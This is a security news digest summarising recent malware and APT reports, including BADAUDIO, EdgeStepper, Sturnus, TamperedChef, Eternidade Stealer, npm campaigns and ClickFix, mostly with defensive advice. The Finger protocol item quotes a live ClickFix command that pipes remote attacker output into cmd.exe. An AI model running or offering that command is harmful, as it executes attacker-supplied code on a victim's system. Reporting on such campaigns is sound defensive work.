CISO Brief

All news with #malware tag


APT24 Pivot to BADAUDIO Multi-Vector Attacks in Taiwan

🔍 Google Threat Intelligence Group (GTIG) details a three-year espionage campaign by APT24 deploying the obfuscated BADAUDIO downloader to deliver AES-encrypted payloads, including Cobalt Strike beacons. The actor evolved from broad strategic web compromises to targeted supply-chain abuse of a Taiwanese digital marketing firm and spear-phishing lures. BADAUDIO uses DLL search order hijacking, control-flow flattening, and cookie-based beaconing to retrieve decrypted payloads in memory. GTIG added related domains and files to Safe Browsing, issued victim notifications, and published IOCs and YARA rules to support detection and mitigation.

PlushDaemon uses EdgeStepper to hijack DNS and updates

🔒 PlushDaemon, a China-linked APT, has deployed a network implant called EdgeStepper to hijack DNS on compromised routers and redirect update traffic to attacker-controlled servers, according to ESET. The MIPS32 Go-built implant modifies iptables to forward UDP port 53 to a local proxy that substitutes legitimate update IPs with malicious ones. Using the hijacked channel, a downloader chain (LittleDaemon, DaemonicLogistics) delivers the espionage backdoor SlowStepper, enabling credential theft, document exfiltration and audio/video capture.

Sturnus Android Banking Trojan Targets Southern Europe

🛡️ ThreatFabric has detailed a new Android banking trojan named Sturnus that combines screen-capture, accessibility abuse, and overlays to steal credentials and enable full device takeover. The malware captures decrypted messages from WhatsApp, Telegram, and Signal by recording the device screen, serves region-specific fake banking login screens, and contacts operator servers via WebSocket/HTTP to receive encrypted payloads and enable remote VNC-style control. It resists cleanup by blocking uninstallation and leveraging administrator privileges.

Sturnus Android Trojan Steals Messages and Controls Devices

🔒 Sturnus is a new Android banking trojan discovered by ThreatFabric that can capture decrypted messages from end-to-end encrypted apps like Signal, WhatsApp, and Telegram. It abuses Accessibility services and on-screen capture to read message content and deploys HTML overlays to harvest banking credentials. The malware also supports real-time, AES-encrypted VNC remote control and obtains Android Device Administrator privileges to resist removal while targeting European financial customers with region-specific overlays.

Smashing Security Ep 444: Honest Breach and Hotel Phish

📰 In episode 444 of the Smashing Security podcast, Graham Cluley and guest Tricia Howard examine a refreshingly candid breach response in which a company apologised and redirected a ransom payment to cybersecurity research, illustrating how legacy systems can still magnify risk. They unpack a sophisticated hotel-booking malware campaign that abuses trust in apps and CAPTCHAs to deliver PureRAT. The hosts also discuss the rise of autonomous pen testing, AI-turbocharged cybercrime, and practical questions CISOs should be asking on Monday morning, and the episode includes a featured interview with Snehal Antani from Horizon3.ai.

TamperedChef Malware Uses Fake Installers in Global Campaign

⚠️ Acronis Threat Research Unit (TRU) reports an ongoing global malvertising campaign, dubbed TamperedChef, that employs counterfeit installers masquerading as popular utilities and product manuals to deploy an information-stealer and obfuscated JavaScript backdoors. Operators use SEO poisoning, malicious ads, and abused code-signing certificates from shell companies in the U.S., Panama, and Malaysia to increase trust and evade detection. Installers drop an XML file to create a scheduled task that launches the JavaScript backdoor, which exfiltrates encrypted, Base64-encoded JSON over HTTPS. Infections concentrate in the U.S. and have also been observed in Israel, Spain, Germany, India, and Ireland, with healthcare, construction, and manufacturing among the most affected sectors.

Python WhatsApp Worm Spreads Eternidade Stealer Across Brazil

📲 Trustwave SpiderLabs describes a Python-based WhatsApp worm that propagates a Delphi credential stealer named Eternidade Stealer across Brazilian devices. The campaign begins with an obfuscated Visual Basic Script dropper that installs both a Python WPPConnect-based propagator and an MSI/AutoIt installer which injects the stealer into svchost.exe. Operators use IMAP to fetch dynamic C2 addresses and apply Brazilian Portuguese geofencing to limit infections to the target region.

Eternidade Stealer: WhatsApp Worm Targets Brazil's Ecosystem

🔒 Trustwave SpiderLabs has identified Eternidade Stealer, a multi-component banking Trojan that combines a Python-based WhatsApp-propagating worm, a Delphi stealer and an MSI dropper to harvest financial credentials and spread laterally. The campaign uses an obfuscated VBScript to deliver two payloads, dynamically retrieves command-and-control via IMAP and activates only on systems using Brazilian Portuguese. Defenders should watch for unexpected MSI or script executions, suspicious WhatsApp messages and indicators linked to the campaign.

PlushDaemon Deploys EdgeStepper AitM Malware Globally

🛡️ A China-aligned group known as PlushDaemon has been observed deploying a previously undocumented network implant, codenamed EdgeStepper, to perform adversary-in-the-middle DNS attacks. ESET researchers found an ELF sample (internally called dns_cheat_v2) that forwards DNS traffic to attacker-controlled nodes, enabling update hijacking. Operators then deploy the downloaders LittleDaemon and DaemonicLogistics to install espionage backdoors.

PlushDaemon Hijacks Software Updates in Supply-Chain Attacks

🔒 PlushDaemon operators are hijacking software-update traffic using a new network implant named EdgeStepper, ESET researchers report. Attackers compromise routers via known vulnerabilities or weak credentials, intercept DNS queries, and redirect update requests to malicious infrastructure. Trojanized updates deliver a DLL downloader (LittleDaemon), which stages DaemonicLogistics and ultimately loads the SlowStepper backdoor on Windows systems, targeting manufacturers, universities, and industrial sites across multiple countries.

Validating Chrome Extensions: Organizational Security

🔒 This article by Stan Kaminsky reviews Athanasios Giatsos’ Security Analyst Summit 2025 talk and explains why malicious browser extensions are a major blind spot for organizations. It outlines how extensions can access cookies, local storage, proxy settings, clipboard and screen capture, enabling session and account theft, espionage, ad fraud and crypto theft, and why Manifest V3 reduces but does not eliminate risk. Practical controls described include formal extension policies and allowlists, disabling developer mode, version pinning and testing of updates, EDR and SIEM-based monitoring, and the use of specialized vetting tools for deeper analysis.

npm Malware Campaign Redirects Visitors to Fake Crypto Sites

🛡️ Researchers from the Socket Threat Research Team uncovered a new npm malware campaign operated by threat actor dino_reborn, distributed across seven packages that executed immediately and fingerprinted visitors. The packages used Adspect proxying and cloaking to distinguish researchers from victims, delivering branded fake CAPTCHAs and dynamic redirects to malicious crypto sites. Anti-analysis measures disabled developer tools and user interactions to hinder inspection.

AWS Transfer Family Terraform Module Adds Malware Scanning

🛡️ AWS has updated the Transfer Family Terraform module to support automated malware scanning workflows for files transferred to S3. The module provisions GuardDuty S3 Protection–based scan pipelines, dynamic routing based on results, and threat notifications in a single deployment. It preserves folder structure, allows granular S3 prefix targeting, and helps ensure only verified clean files reach applications and data lakes.

AI-Enhanced Tuoni Framework Targets US Real Estate Firm

🔍 Morphisec observed an AI-enhanced intrusion in October 2025 that targeted a major US real estate firm using the modular Tuoni C2 framework. The campaign began with a Microsoft Teams impersonation and a PowerShell one-liner that spawned a hidden process to retrieve a secondary script. That loader downloaded a BMP file and used least significant bit steganography to extract shellcode, executing it entirely in memory and reflectively loading TuoniAgent.dll. Researchers noted AI-generated code patterns and an encoded configuration pointing to two C2 servers; Morphisec's AMTD prevented execution.

Malicious npm Packages Use Adspect to Cloak Crypto Scams

⚠️ Seven npm packages published under the developer name 'dino_reborn' were found leveraging the cloud-based Adspect service to distinguish researchers from potential victims and redirect targeted users to cryptocurrency scam pages. Socket's analysis shows six packages include a ~39 KB cloaking script that fingerprints visitors, employs anti-analysis controls, and forwards data to an actor-controlled proxy and the Adspect API. Targets are redirected to deceptive Ethereum and Solana-branded CAPTCHA pages, while likely researchers are shown a benign Offlido-style decoy.

EVALUSION ClickFix Campaign Delivers Amatera, NetSupport

🔒 Researchers identified a ClickFix-based EVALUSION campaign deploying Amatera Stealer and NetSupport RAT, observed in November 2025. The campaign abuses the Windows Run dialog and mshta.exe to launch a PowerShell script that downloads a .NET DLL hosted on MediaFire; the Amatera DLL, packed with PureCrypter, is injected into MSBuild.exe to exfiltrate data. eSentire highlights Amatera's WoW64 SysCalls evasion and conditional NetSupport deployment when domain membership or valuable files are detected.

Job-test malware campaign shifts to public JSON dropboxes

🔎 The Contagious Interview campaign is delivering trojanized coding tests that fetch heavily obfuscated JavaScript from public JSON-storage services such as JSON Keeper, JSONSilo, and npoint.io. When executed in a Node.js test run the payloads decode and install the BeaverTail infostealer and then stage the InvisibleFerret RAT. NVISO Labs warns attackers are abusing developer trust and legitimate platforms and recommends sandboxing, auditing config files, and blocking suspicious outbound requests.

Dragon Breath Deploys RONINGLOADER to Deliver Gh0st RAT

🔒 Elastic Security Labs and Unit 42 describe a China‑focused campaign in which the actor Dragon Breath uses a multi‑stage loader named RONINGLOADER to deliver a modified Gh0st RAT. The attack leverages trojanized NSIS installers that drop two embedded packages—one benign and one stealthy—to load a DLL and an encrypted tp.png file containing shellcode. The loader employs signed drivers, WDAC tampering, and Protected Process Light abuse to neutralise endpoint protections popular in the Chinese market before injecting a persistent high‑privilege backdoor.

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.

Massive npm Worm Floods Registry to Harvest Tea Tokens

🔥 A coordinated worm is flooding the npm registry with packages designed to steal tokens from developers using the Tea Protocol, researchers say. Amazon and Sonatype report the campaign has expanded to roughly 153,000 packages, up from about 15,000 a year ago. While Tea tokens currently lack monetary value, experts warn threat actors could pivot to deliver malware or monetize rewards when Mainnet launches. Repositories and IT teams are urged to tighten access controls and deploy advanced detection.